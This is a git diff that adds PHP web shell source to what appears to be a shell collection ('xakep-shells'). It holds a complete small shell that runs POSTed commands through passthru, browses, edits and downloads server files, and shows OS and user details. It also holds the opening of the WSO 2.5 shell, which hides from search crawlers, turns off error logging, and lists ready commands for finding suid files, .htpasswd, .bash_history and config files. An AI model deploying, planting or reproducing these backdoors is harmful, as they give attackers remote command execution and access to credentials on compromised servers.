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","download" => "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=");
+
+//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable
+if (isset($_GET['img']))
+{
+header("Content-type: image/gif");
+echo base64_decode($images[$_GET['img']]);
+die();
+}
+//Sets the directory to the directory specified
+if (isset($_GET['dir']))
+{
+	$current_dir = realpath($_GET['dir'])."/";
+}
+else
+{
+	$current_dir = './';
+}
+
+//Run a CLI command if one has been sent
+if (isset($_POST['CLICommand']))
+{
+	echo "<pre>";
+	echo "<b>Output From Command: </b><br />";
+	echo "<textarea cols='120' rows='25'>";
+	passthru($_POST['CLICommand']);
+	echo "</textarea>";
+	echo "</pre>";
+	die();
+}
+
+//set the current_dir url
+if (($current_dir == './') && (!isset($_COOKIE['dshell'])))
+{
+	$surl = $_SERVER['REQUEST_URI'];
+	setcookie('dshell',$surl,time()+99999);
+}
+elseif (!isset($_COOKIE['dshell']))
+	die('Error Could Not load the default path');
+else
+	$surl = $_COOKIE['dshell'];
+	
+function scan_dir($current_dir)
+{
+$chemin=$current_dir;
+if (glob("$chemin*"))
+{
+$files = glob("$chemin*");
+$fileListing = "";
+foreach ($files as $filename) {
+	  $fileListing .= "$filename-<";
+   }
+   $listing = explode('-<',$fileListing);
+   return $listing;
+ }
+ else
+ {
+	die("Couldn't Read directory, Blocked!!!");
+ }
+}
+
+//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p
+//Anyway this function gets the permssions in rwx form thats read write execute format.
+function perms_check($file)
+{
+	$perms = fileperms($file);
+
+if (($perms & 0xC000) == 0xC000) {
+    // Socket
+    $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+    // Symbolic Link
+    $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+    // Regular
+    $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+    // Block special
+    $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+    // Directory
+    $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+    // Character special
+    $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+    // FIFO pipe
+    $info = 'p';
+} else {
+    // Unknown
+    $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+
+	return $info;
+}
+
+
+//Function to display the files in the current_dir variable
+function dir_scan($current_dir) {
+$output="<tr><td><font color='red'>Filename</font></td><td><font color='red'>Permissions</font></td><td><font color='red'>Actions</font></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."./'>.</a></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."../'>..</a></td></tr>";
+$output_left="";
+foreach(scan_dir($current_dir) as $item) 
+{
+	if ($item == "." || $item == "..")
+	{
+		$item = str_replace($current_dir,"",$item);
+		$output .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td>".
+	"</td></tr>";
+	
+	}
+	else
+	{
+	if ($item == "")
+	{ }
+	else
+	{
+	if (is_dir($item))
+	{
+		$perms = perms_check($item);
+		$item = str_replace($current_dir,"",$item);
+		$output .="<tr><td width='90%'>"."<a href='?dir=".$current_dir.$item."/'>".$item."</a></td><td width='10%'>$perms</td><td>&nbsp&nbsp</td></tr>";
+	}
+	else
+	{
+	$perms = perms_check($item);
+	$item = str_replace($current_dir,"",$item);
+		$output_left .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td width='10%'>$perms</td><td>".
+	"<a href='?action=download&file=".$current_dir.$item."'><img src='".$surl."?img=download' border='0'></a><a href='".$surl."?action=edit&file=".$current_dir.$item."'><img src='".$surl."?img=edit' border='0'></a><br />".
+	"</td></tr>";
+	}
+	}
+	}
+}
+	$output .=$output_left;
+	return $output;
+}
+
+//Edit File Function, $mode can be r(read) w(write)
+//Content is needed only if writing
+function fedit($fileLocale,$mode,$content = "")
+{
+	if ($mode == "r")
+	{
+		$output = htmlspecialchars(file_get_contents($fileLocale));
+		return $output;
+	}
+	elseif ($mode == "w")
+	{
+		if ($content == "")
+			echo("Error No Content Provided!");
+		else {
+		$file = fopen($fileLocale,"w");
+		if (fwrite($file,stripslashes($content)))
+		{
+			$value = 1;
+		}
+		else 
+			$value = 0;
+		fclose($file);
+		return $value;
+		}
+	}
+}
+
+//Function for showing the edit page.
+function edit($file)
+{
+	return "<tr><td><center><form action='".$surl."?action=write&file=".$_GET['file']."' method='post'>
+	<textarea name='content' cols=100 rows=15>".fedit($file,'r')."</textarea><br /><input type='submit' value='Save'></center></form></td></tr>";
+}
+
+//Setup the Action
+if (!isset($_GET['action']))
+{
+	$action = dir_scan($current_dir);
+}
+elseif ($_GET['action'] == 'edit')
+{
+	$action = edit($_GET['file']);
+}
+elseif ($_GET['action'] == 'write')
+{
+	if (fedit($_GET['file'],'w',$_POST['content']))
+		$action = "<tr><td>Successful</td></tr>";
+	else
+		$action = "<tr><td>Error Writing File, Possible Permission Problem</td></tr>";
+}
+elseif ($_GET['action'] == 'download')
+{
+	$filename = $_GET['file'];
+	$filename = trim($filename); 
+	$file = $path.$filename; 
+	$file_size = filesize($file); 
+	if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) { 
+	header("Content-Type: doesn/matter"); 
+	header("Content-Disposition: filename=$filename"); 
+	header("Content-Transfer-Encoding: binary"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+	else { 
+	Header("Content-type: file/unknown"); 
+	Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename)); 
+	Header("Content-Description: PHP3 Generated Data"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+
+	if (is_file("$file")) { 
+	$fp = fopen("$file", "r"); 
+	if (!fpassthru($fp)) 
+	fclose($fp); 
+	} 
+	die();
+}
+
+//Actual Output
+echo "<html><body bgcolor='black' text='white'>\n";
+echo "<center>\n";
+echo "<table width='90%'>\n";
+echo "<tr><td colspan='2'><center><img src='".$surl."?img=banner'></center></td></tr>\n";
+echo "<tr><td colspan='2'><b>Operating System Information: </b>".php_uname()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Server Running As: </b>".get_current_user()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Current Directory: </b>".wordwrap(realpath($current_dir),100,'<br />')."</td></tr>\n";
+echo $action;
+echo "<tr><td colspan='2'>&nbsp</td></tr>";
+echo "<tr><td colspan='2'><b>Run Command: </b><form action='' method='post'><input type='text' name='CLICommand'><input type='submit' value='Run!'></form></td></tr>\n";
+echo "</table></center>\n";
+echo "</body></html>\n";
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/wso.txt b/xakep-shells/PHP/wso.txt
new file mode 100644
index 0000000..0768fb9
--- /dev/null
+++ b/xakep-shells/PHP/wso.txt
@@ -0,0 +1,1523 @@
+<?php
+$color = "#df5";
+$default_action = 'FilesMan';
+$default_use_ajax = true;
+$default_charset = 'Windows-1251';
+
+if($argc == 3) {
+	$_POST = unserialize(base64_decode($argv[1]));
+	$_SERVER = unserialize(base64_decode($argv[2]));
+}
+
+if(!empty($_SERVER['HTTP_USER_AGENT'])) {
+    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
+    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
+        header('HTTP/1.0 404 Not Found');
+        exit;
+    }
+}
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@define('WSO_VERSION', '2.5');
+
+if(get_magic_quotes_gpc()) {
+	function WSOstripslashes($array) {
+		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
+	}
+	$_POST = WSOstripslashes($_POST);
+    $_COOKIE = WSOstripslashes($_COOKIE);
+}
+
+function wsoLogin() {
+	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
+}
+
+function WSOsetcookie($k, $v) {
+    $_COOKIE[$k] = $v;
+    setcookie($k, $v);
+}
+
+if(!empty($auth_pass)) {
+    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
+
+    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
+        wsoLogin();
+}
+
+if(strtolower(substr(PHP_OS,0,3)) == "win")
+	$os = 'win';
+else
+	$os = 'nix';
+
+$safe_mode = @ini_get('safe_mode');
+if(!$safe_mode)
+    error_reporting(0);
+
+$disable_functions = @ini_get('disable_functions');
+$home_cwd = @getcwd();
+if(isset($_POST['c']))
+	@chdir($_POST['c']);
+$cwd = @getcwd();
+if($os == 'win') {
+	$home_cwd = str_replace("\\", "/", $home_cwd);
+	$cwd = str_replace("\\", "/", $cwd);
+}
+if($cwd[strlen($cwd)-1] != '/')
+	$cwd .= '/';
+
+if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
+    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
+
+if($os == 'win')
+	$aliases = array(
+		"List Directory" => "dir",
+    	"Find index.php in current dir" => "dir /s /w /b index.php",
+    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
+    	"Show active connections" => "netstat -an",
+    	"Show running services" => "net start",
+    	"User accounts" => "net user",
+    	"Show computers" => "net view",
+		"ARP Table" => "arp -a",
+		"IP Configuration" => "ipconfig /all"
+	);
+else
+	$aliases = array(
+  		"List dir" => "ls -lha",
+		"list file attributes on a Linux second extended file system" => "lsattr -va",
+  		"show opened ports" => "netstat -an | grep -i listen",
+        "process status" => "ps aux",
+		"Find" => "",
+  		"find all suid files" => "find / -type f -perm -04000 -ls",
+  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
+  		"find all sgid files" => "find / -type f -perm -02000 -ls",
+  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
+  		"find config.inc.php files" => "find / -type f -name config.inc.php",
+  		"find config* files" => "find / -type f -name \"config*\"",
+  		"find config* files in current dir" => "find . -type f -name \"config*\"",
+  		"find all writable folders and files" => "find / -perm -2 -ls",
+  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
+  		"find all service.pwd files" => "find / -type f -name service.pwd",
+  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
+  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
+  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
+  		"find all .bash_history files" => "find / -type f -name .bash_history",
+  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
+  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
+  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
+		"Locate" => "",
+  		"locate httpd.conf files" => "locate httpd.conf",
+		"locate vhosts.conf files" => "locate vhosts.conf",
+		"locate proftpd.conf files" => "locate proftpd.conf",
+		"locate psybnc.conf files" => "locate psybnc.conf",
+		"locate my.conf files" => "locate my.conf",
+		"locate admin.php files" =>"locate admin.php",
+		"locate cfg.php files" => "locate cfg.php",
+		"locate conf.php files" => "locate conf.php",
+		"locate config.dat files" => "locate config.dat",
+		"locate config.php files" => "locate config.php",
+		"locate config.inc files" => "locate config.inc",
+		"locate config.inc.php" => "locate config.inc.php",
+		"locate config.default.php files" => "locate config.default.php",
+		"locate config* files " => "locate config",
+		"locate .conf files"=>"locate '.conf'",
+		"locate .pwd files" => "locate '.pwd'",
+		"locate .sql files" => "locate '.sql'",
+		"locate .htpasswd files" => "locate '.htpasswd'",
+		"locate .bash_history files" => "locate '.bash_history'",
+		"locate .mysql_history files" => "locate '.mysql_history'",
+		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
+		"locate backup files" => "locate backup",
+		"locate dump files" => "locate dump",
+		"locate priv files" => "locate priv"
+	);
+
+function wsoHeader() {
+	if(empty($_POST['charset']))
+		$_POST['charset'] = $GLOBALS['default_charset'];
+	global $color;
+	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
+<style>
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: $color !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{ text-decoration:none; }
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:300px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+#toolsTbl{ text-align:center; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+.l2{background-color:#333}
+pre{font-family:Courier,Monospace;}
+</style>
+<script>
+    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
+    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
+    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
+    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
+    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
+    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
+    var d = document;
+	function set(a,c,p1,p2,p3,charset) {
+		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
+		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
+		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
+		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
+		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
+		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
+	}
